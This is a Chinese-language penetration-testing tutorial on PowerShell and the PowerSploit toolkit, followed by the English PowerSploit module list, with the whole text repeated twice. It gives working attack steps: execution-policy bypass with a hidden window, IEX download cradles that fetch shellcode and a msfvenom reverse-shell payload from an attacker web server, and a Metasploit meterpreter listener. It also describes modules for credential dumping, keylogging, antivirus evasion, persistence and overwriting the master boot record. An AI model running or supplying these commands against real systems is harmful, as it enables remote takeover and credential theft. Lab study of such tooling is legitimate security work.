Powershell内网渗透利器之PowerSploit
powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。
PowerShell具有以下特点。
1、在Windows 7以上的操作系统中是默认安装的。
2、PowerShell脚本可以运行在内存中,不需要写入磁盘。
3、几乎不会触发杀毒软件。
4、可以远程执行。
5、目前很多工具都是基于PowerShell开发的。
6、使得Windows的脚本攻击变得更加容易。
7、cmd.exe通常会被阻止运行,但是PowerShell不会。
8、可以用来管理活动目录。
下面以文件操作为例讲解PowerShell命令的基本用法。
1、新建目录:New-ltem whitecellclub-ltemType Directory。
2、新建文件:New-ltem light.txt-ltemType File。
3、删除目录:Remove-ltem whitecellclub。
4、显示文本内容:Get-Content test.txt。
5、设置文本内容:Set-Content test.txt-Va l u e''hello,word! ''。
6、追加内容:Add-Content light.txt-Value ''i love you ''。
7、清除内容:Clear-Content test.txt。
请参考powershell在线教程:https://www.pstips.net/powershell-online-tutorials
攻击机:kali
靶机:server2008 R2
首先在kali里把web服务给开开。
下载最新版的PowerSploit脚本文件到本地;git clone https://github.com/mattifestation/PowerSploit.git
PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。
再把PowerSploit文件放到web目录中
用msfvenom生成一个反弹shell,方便invoke-shellcode注入,再把shell放到web里
(1)绕过本地权限执行
如果是管理员身份可以运行powerrshell之后,设置脚本的运行策略
set-executionpolicy unrestricted
PowerShell脚本在默认情况下无法直接执行,这时可以使用下面方法绕过安全策略,运行PowerShell脚本绕过本地权限 执行。( 注:先上传PowerUp.ps1至目标服务器)
powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"
运行完隐藏命令后窗口会关闭,绕过本地权限隐藏执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl
(2)从网站服务器上下载PS1脚本,绕过本地权限隐藏执行
在靶机上执行命令(为了更直观所以通过IEX下载调用invoke-shellcode以及生成的反弹马。)
IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1”)
IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/code”)
执行
Invoke-Shellcode -shellcode $buf -Foece
用msf设置监听
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LhOST 192.168.47.131
执行监听,查看效果
若关闭powershell,那么连接也会终断, 因为承载木马的powershell被关闭了。
下面对上述命令中的参数进行说明。
1-ExecutionPolicy Bypass(-Exec Bypass):绕过执行安全策略,这个参数非常重要。在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意安全保护规则。在渗透测试中,通常每次运行PowerShell脚本时都要使用这个参数。
2-WindowStyle Hidden(-W Hidden):隐藏窗口。
3-Nonlnteractive(-NonI):非交互模式。PowerShell不为用户提供交互的提示。-NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
4-noexit:执行后不退出Shell。这在使用键盘记录等脚本时非常重要。
5-NoLogo:启动不显示版权标志的PowerShell。
Windows操作系统中,存在两个版本的PowerShell,一个x64版的,还有一个x86版的。 这两个版本的执行策略不会相互影响,可以把它们看成两个独立的程序。x64版PowerShell的配置文件位于%windir%\syswow64\WindowsPowerShell\v1.0\下。
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
CodeExecution
Execute code on a target machine.
Invoke-DllInjection
Injects a Dll into the process ID of your choosing.
Invoke-ReflectivePEInjection
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
Invoke-Shellcode
Injects shellcode into the process ID of your choosing or within PowerShell locally.
Invoke-WmiCommand
Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.
ScriptModification
Modify and/or prepare scripts for execution on a compromised machine.
Out-EncodedCommand
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
Out-CompressedDll
Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
Out-EncryptedScript
Encrypts text files/scripts.
Remove-Comment
Strips comments and extra whitespace from a script.
Persistence
Add persistence capabilities to a PowerShell script
New-UserPersistenceOption
Configure user-level persistence options for the Add-Persistence function.
New-ElevatedPersistenceOption
Configure elevated persistence options for the Add-Persistence function.
Add-Persistence
Add persistence capabilities to a script.
Install-SSP
Installs a security support provider (SSP) dll.
Get-SecurityPackages
Enumerates all loaded security packages (SSPs).
AntivirusBypass
AV doesn't stand a chance against PowerShell!
Find-AVSignature
Locates single Byte AV signatures utilizing the same method as DSplit from "class101".
Exfiltration
All your data belong to me!
Invoke-TokenManipulation
Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.
Invoke-CredentialInjection
Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
Invoke-NinjaCopy
Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Invoke-Mimikatz
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
Get-Keystrokes
Logs keys pressed, time and the active window.
Get-GPPPassword
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
Get-GPPAutologon
Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
Get-TimedScreenshot
A function that takes screenshots at a regular interval and saves them to a folder.
New-VolumeShadowCopy
Creates a new volume shadow copy.
Get-VolumeShadowCopy
Lists the device paths of all local volume shadow copies.
Mount-VolumeShadowCopy
Mounts a volume shadow copy.
Remove-VolumeShadowCopy
Deletes a volume shadow copy.
Get-VaultCredential
Displays Windows vault credential objects including cleartext web credentials.
Out-Minidump
Generates a full-memory minidump of a process.
Get-MicrophoneAudio
Records audio from system microphone and saves to disk
Mayhem
Cause general mayhem with PowerShell.
Set-MasterBootRecord
Proof of concept code that overwrites the master boot record with the message of your choice.
Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell.
Privesc
Tools to help with escalating privileges on a target.
PowerUp
Clearing house of common privilege escalation checks, along with some weaponization vectors.
Recon
Tools to aid in the reconnaissance phase of a penetration test.
Invoke-Portscan
Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
Get-HttpStatus
Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
Invoke-ReverseDnsLookup
Scans an IP address range for DNS PTR records.
PowerView
PowerView is series of functions that performs network and Windows domain enumeration and exploitation.
Recon\Dictionaries
A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.
- admin.txt - http://cirt.net/nikto2/
- generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
- sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/
powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。
PowerShell具有以下特点。
1、在Windows 7以上的操作系统中是默认安装的。
2、PowerShell脚本可以运行在内存中,不需要写入磁盘。
3、几乎不会触发杀毒软件。
4、可以远程执行。
5、目前很多工具都是基于PowerShell开发的。
6、使得Windows的脚本攻击变得更加容易。
7、cmd.exe通常会被阻止运行,但是PowerShell不会。
8、可以用来管理活动目录。
下面以文件操作为例讲解PowerShell命令的基本用法。
1、新建目录:New-ltem whitecellclub-ltemType Directory。
2、新建文件:New-ltem light.txt-ltemType File。
3、删除目录:Remove-ltem whitecellclub。
4、显示文本内容:Get-Content test.txt。
5、设置文本内容:Set-Content test.txt-Va l u e''hello,word! ''。
6、追加内容:Add-Content light.txt-Value ''i love you ''。
7、清除内容:Clear-Content test.txt。
请参考powershell在线教程:https://www.pstips.net/powershell-online-tutorials
攻击机:kali
靶机:server2008 R2
首先在kali里把web服务给开开。
下载最新版的PowerSploit脚本文件到本地;git clone https://github.com/mattifestation/PowerSploit.git
PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。
再把PowerSploit文件放到web目录中
用msfvenom生成一个反弹shell,方便invoke-shellcode注入,再把shell放到web里
(1)绕过本地权限执行
如果是管理员身份可以运行powerrshell之后,设置脚本的运行策略
set-executionpolicy unrestricted
PowerShell脚本在默认情况下无法直接执行,这时可以使用下面方法绕过安全策略,运行PowerShell脚本绕过本地权限 执行。( 注:先上传PowerUp.ps1至目标服务器)
powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"
运行完隐藏命令后窗口会关闭,绕过本地权限隐藏执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl
(2)从网站服务器上下载PS1脚本,绕过本地权限隐藏执行
在靶机上执行命令(为了更直观所以通过IEX下载调用invoke-shellcode以及生成的反弹马。)
IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1”)
IEX(New-Object Net.WebClient).DownloadString(“http://192.168.1.1/code”)
执行
Invoke-Shellcode -shellcode $buf -Foece
用msf设置监听
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LhOST 192.168.47.131
执行监听,查看效果
若关闭powershell,那么连接也会终断, 因为承载木马的powershell被关闭了。
下面对上述命令中的参数进行说明。
1-ExecutionPolicy Bypass(-Exec Bypass):绕过执行安全策略,这个参数非常重要。在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意安全保护规则。在渗透测试中,通常每次运行PowerShell脚本时都要使用这个参数。
2-WindowStyle Hidden(-W Hidden):隐藏窗口。
3-Nonlnteractive(-NonI):非交互模式。PowerShell不为用户提供交互的提示。-NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
4-noexit:执行后不退出Shell。这在使用键盘记录等脚本时非常重要。
5-NoLogo:启动不显示版权标志的PowerShell。
Windows操作系统中,存在两个版本的PowerShell,一个x64版的,还有一个x86版的。 这两个版本的执行策略不会相互影响,可以把它们看成两个独立的程序。x64版PowerShell的配置文件位于%windir%\syswow64\WindowsPowerShell\v1.0\下。
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
CodeExecution
Execute code on a target machine.
Invoke-DllInjection
Injects a Dll into the process ID of your choosing.
Invoke-ReflectivePEInjection
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
Invoke-Shellcode
Injects shellcode into the process ID of your choosing or within PowerShell locally.
Invoke-WmiCommand
Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.
ScriptModification
Modify and/or prepare scripts for execution on a compromised machine.
Out-EncodedCommand
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
Out-CompressedDll
Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
Out-EncryptedScript
Encrypts text files/scripts.
Remove-Comment
Strips comments and extra whitespace from a script.
Persistence
Add persistence capabilities to a PowerShell script
New-UserPersistenceOption
Configure user-level persistence options for the Add-Persistence function.
New-ElevatedPersistenceOption
Configure elevated persistence options for the Add-Persistence function.
Add-Persistence
Add persistence capabilities to a script.
Install-SSP
Installs a security support provider (SSP) dll.
Get-SecurityPackages
Enumerates all loaded security packages (SSPs).
AntivirusBypass
AV doesn't stand a chance against PowerShell!
Find-AVSignature
Locates single Byte AV signatures utilizing the same method as DSplit from "class101".
Exfiltration
All your data belong to me!
Invoke-TokenManipulation
Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread.
Invoke-CredentialInjection
Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
Invoke-NinjaCopy
Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Invoke-Mimikatz
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
Get-Keystrokes
Logs keys pressed, time and the active window.
Get-GPPPassword
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
Get-GPPAutologon
Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
Get-TimedScreenshot
A function that takes screenshots at a regular interval and saves them to a folder.
New-VolumeShadowCopy
Creates a new volume shadow copy.
Get-VolumeShadowCopy
Lists the device paths of all local volume shadow copies.
Mount-VolumeShadowCopy
Mounts a volume shadow copy.
Remove-VolumeShadowCopy
Deletes a volume shadow copy.
Get-VaultCredential
Displays Windows vault credential objects including cleartext web credentials.
Out-Minidump
Generates a full-memory minidump of a process.
Get-MicrophoneAudio
Records audio from system microphone and saves to disk
Mayhem
Cause general mayhem with PowerShell.
Set-MasterBootRecord
Proof of concept code that overwrites the master boot record with the message of your choice.
Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell.
Privesc
Tools to help with escalating privileges on a target.
PowerUp
Clearing house of common privilege escalation checks, along with some weaponization vectors.
Recon
Tools to aid in the reconnaissance phase of a penetration test.
Invoke-Portscan
Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
Get-HttpStatus
Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
Invoke-ReverseDnsLookup
Scans an IP address range for DNS PTR records.
PowerView
PowerView is series of functions that performs network and Windows domain enumeration and exploitation.
Recon\Dictionaries
A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.
- admin.txt - http://cirt.net/nikto2/
- generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
- sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/